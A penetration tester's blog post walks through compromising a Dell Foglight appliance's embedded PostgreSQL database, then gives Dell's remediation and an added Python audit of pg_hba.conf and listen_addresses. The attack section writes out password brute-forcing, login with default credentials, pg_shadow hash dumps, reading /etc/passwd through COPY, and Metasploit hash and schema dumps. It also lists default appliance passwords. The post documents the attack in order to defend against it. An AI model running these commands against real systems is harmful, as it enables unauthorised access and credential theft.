ATTACKING DELL FOGLIGHT SERVER

I was just talking to someone a little while ago, and I told them how I rarely run into Postgres on pentests. However, I have run into Foglight, which is a Postgres-based product. OK, so what is a Dell Foglight box? A while back, I ran into one of these while I was on a pentest.

Let's see what Dell says it is: "Dell's application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending Transaction DNA technology."

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

Next, here is a quick walk-through of me attacking Dell Foglight using Nmap NSE scripts, some Postgres syntax, Metasploit, and a free rainbow-table website called CrackStation.net. It also covers the proper remediation for the attack. Yes, basically, I sanitized a pentest compromise notification document and later turned it into a blog post. But c'mon, it's been a really busy week and this is still good stuff.

Let's get started.

My Attack Virtual Machine

Here is the virtual machine that I used for this:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

Nmap Syntax

Here we use Nmap to show how an attacker would identify a host running PostgreSQL.

First, we scan TCP port 5432 with version detection (-sV) to confirm the host is running PostgreSQL:

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX


Next, we run the NSE script "pgsql-brute" against the system. It tries username/password pairs from Nmap's built-in lists; if you have appliance-specific guesses, supply your own with --script-args userdb=users.txt,passdb=passwords.txt:

sudo nmap -sV -p 5432 --script pgsql-brute XXX.XXX.XXX.XXX


Nmap NSE script reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html

psql Attack Syntax

Here, we use the command-line PostgreSQL client psql to connect to the database as the default superuser. Role names are case-sensitive, so the user is postgres, not Postgres; -W forces a password prompt, and the last argument is the database name:

psql -h XXX.XXX.XXX.XXX -U postgres -W postgres


Next, we list all the databases on the postgres system:

\l

 


Afterward, we list the role names and their MD5 password hashes from pg_shadow. These are database accounts, not system accounts. Note the column name is usename (not username), and reading pg_shadow requires superuser rights, which the postgres role has:

select usename, passwd from pg_shadow;


Next, we show which database we are currently connected to:

select current_database();


Next, we create a scratch table called "secureninja" to hold any data we later want to examine:

create table secureninja (input TEXT);


Next, we copy the server's /etc/passwd file into the secureninja table we just created. COPY ... FROM a file is a superuser-only, server-side read: the file is opened by the PostgreSQL OS user on the database host, so this technique reaches any file that user can read, not just /etc/passwd:

copy secureninja from '/etc/passwd';


Next, we display the /etc/passwd data that we copied into the secureninja table:

select input from secureninja;


Next, we drop the scratch table so the customer database is left as we found it:

drop table secureninja;


Next, we exit the Postgres database:

\q


Using a website like https://crackstation.net/, we can check the hashes for each database user (vkernel, root, postgres). One caveat when doing this: PostgreSQL stores an md5 role password as the literal prefix "md5" followed by MD5(password || username), so the role name acts as a salt. Paste only the 32 hex characters after the prefix, and expect a hit to come back as the password with the username appended (for example, a result of "postgrespostgres" for the postgres role means the password is "postgres").


Here we start to use a common hacker tool called Metasploit to attack the database:

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

Once the framework finishes loading you are at the msf prompt and can select modules.

Here we use Metasploit to dump the PostgreSQL password hashes. The module's USERNAME option defaults to postgres, so only the password and target need to be set:

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run


Next, we use Metasploit to dump the PostgreSQL database schema with the same credentials:

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run


The module then prints the dumped schema: for each database the account can read, its tables and their columns.

Alright, now on to how to fix this. But first, a quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Remediation

Dell provides a knowledge-base article on how to fix this. Note that the same article lists default operating-system credentials for the appliance (vkernel/vkernel and root/password); change those as well, and if nothing outside the appliance needs the embedded database, use option 2 of the script below to stop exposing it to the network at all.

How to change the default passwords for the embedded PostgreSQL database.

Description

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and postgres.

Resolution

Log into the console of the virtual appliance, either directly in the vSphere Client/Hyper-V Manager or over an SSH connection.

  • Log in with the user ID vkernel (default password vkernel)
  • Become the root user with the command su - (default password password)
  • Run /usr/local/vkernel/scripts/externalDbAccess.sh and press ENTER
  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 – Enable the embedded database access from the outside world
2 – Disable the embedded database access from the outside world
3 – Set the database users’ passwords

Please select one of the above:3
Stopping VKernel collector…
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
We have now stopped VKernel collector
done
Stopping VKernel monitor…
VKernel monitor has been stopped
done
Stopping tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database…
Unregistering the appliance from the previous database is done
Migrating Hyper-V collector…
Migrating Hyper-V collector gets done
Updating database multi-appliances registry…
Updating database multi-appliances registry gets done
Updating VKernel configuration…
Updating VKernel configuration is done

Configuration completed
applying the password for user Postgres
applying the password for user vkernel
Starting tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor…
VKernel vOPS Server 6.0: Build 120918.1924. Schema: 8-11.55
We have now started VKernel monitor
done
Starting VKernel collector…
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

Remediation reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015
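Changing the passwords closes the default-credential hole, but the reason Nmap found the database in the first place is that it listens on the network and accepts remote logins. On a standard PostgreSQL install the two settings that decide that are listen_addresses in postgresql.conf and the host rules in pg_hba.conf. The following Python audit is an added example (my code, not from the original post or from Dell's tooling) that parses constructed samples of both files and flags rules that expose the server. The file contents are invented for the demo, and it assumes the appliance's embedded PostgreSQL uses the standard configuration files; the post does not say where they live.

```python
import ipaddress

# Constructed pg_hba.conf for the demo (not taken from a Foglight appliance).
# Line numbers matter: the audit reports them.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER     ADDRESS         METHOD
local   all       all                      trust
host    all       all      127.0.0.1/32    md5
host    all       all      0.0.0.0/0       md5
host    all       all      ::/0            trust
hostssl vkernel   vkernel  10.0.0.0/8      md5
"""

# Constructed postgresql.conf fragment for the demo.
SAMPLE_POSTGRESQL_CONF = """\
#listen_addresses = 'localhost'   # shipped default, commented out
listen_addresses = '*'            # what IP address(es) to listen on
port = 5432
"""


def parse_pg_hba(text):
    """Parse pg_hba.conf into dicts. Handles CIDR addresses and the two-field
    'ADDRESS NETMASK' form; comments and blank lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        ctype = f[0]
        if ctype == "local" and len(f) >= 4:
            entries.append({"lineno": lineno, "type": ctype, "database": f[1],
                            "user": f[2], "address": None, "method": f[3]})
        elif ctype in ("host", "hostssl", "hostnossl") and len(f) >= 5:
            address, method = f[3], f[4]
            if len(f) >= 6 and "/" not in address:
                try:  # e.g. 'host all all 192.168.1.0 255.255.255.0 md5'
                    net = ipaddress.ip_network(f"{address}/{f[4]}", strict=False)
                    address, method = str(net), f[5]
                except ValueError:
                    pass
            entries.append({"lineno": lineno, "type": ctype, "database": f[1],
                            "user": f[2], "address": address, "method": method})
    return entries


def address_scope(address):
    """Classify the ADDRESS field: 'all' (any client), 'loopback', 'network', or a keyword/hostname."""
    if address == "all":
        return "all"
    if address in ("samehost", "samenet"):
        return address
    try:
        net = ipaddress.ip_network(address, strict=False)
    except ValueError:
        return "hostname"
    if net.prefixlen == 0:
        return "all"
    if net.is_loopback:
        return "loopback"
    return "network"


def audit_pg_hba(text):
    """Return (lineno, severity, reason) for every rule that lets clients beyond localhost in."""
    findings = []
    for e in parse_pg_hba(text):
        if e["type"] == "local":
            if e["method"] == "trust":
                findings.append((e["lineno"], "MEDIUM", "local socket logins need no password (trust)"))
            continue
        scope = address_scope(e["address"])
        if scope in ("loopback", "samehost"):
            continue
        where, method = e["address"], e["method"]
        if method == "trust":
            findings.append((e["lineno"], "CRITICAL", f"clients from {where} log in as any role with no password"))
        elif scope == "all":
            findings.append((e["lineno"], "HIGH", f"database reachable from any address ({where}) with {method}"))
        elif method == "password":
            findings.append((e["lineno"], "HIGH", f"cleartext passwords accepted from {where}"))
        else:
            findings.append((e["lineno"], "INFO", f"remote access from {where} for {e['user']}@{e['database']} via {method}"))
    return findings


def listen_addresses(conf_text):
    """Effective listen_addresses value; PostgreSQL's built-in default is 'localhost'."""
    value = "localhost"
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line.startswith("listen_addresses"):
            value = line.partition("=")[2].strip().strip("'\"")
    return value


def listen_exposed(conf_text):
    """True if the server binds every interface, which is what lets the Nmap scan above find it."""
    return any(a.strip() in ("*", "0.0.0.0", "::") for a in listen_addresses(conf_text).split(","))


if __name__ == "__main__":
    print("listen_addresses =", listen_addresses(SAMPLE_POSTGRESQL_CONF), "exposed:", listen_exposed(SAMPLE_POSTGRESQL_CONF))
    for lineno, severity, reason in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"pg_hba.conf:{lineno} [{severity}] {reason}")
```

After running the Dell script with option 2, re-run a check like this (or simply the Nmap scan from the start of the post) to confirm the listener is gone from the network, and keep the password change regardless: a loopback-only database with postgres/postgres is still one local foothold away from full compromise.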


This post was written by Joseph McCray
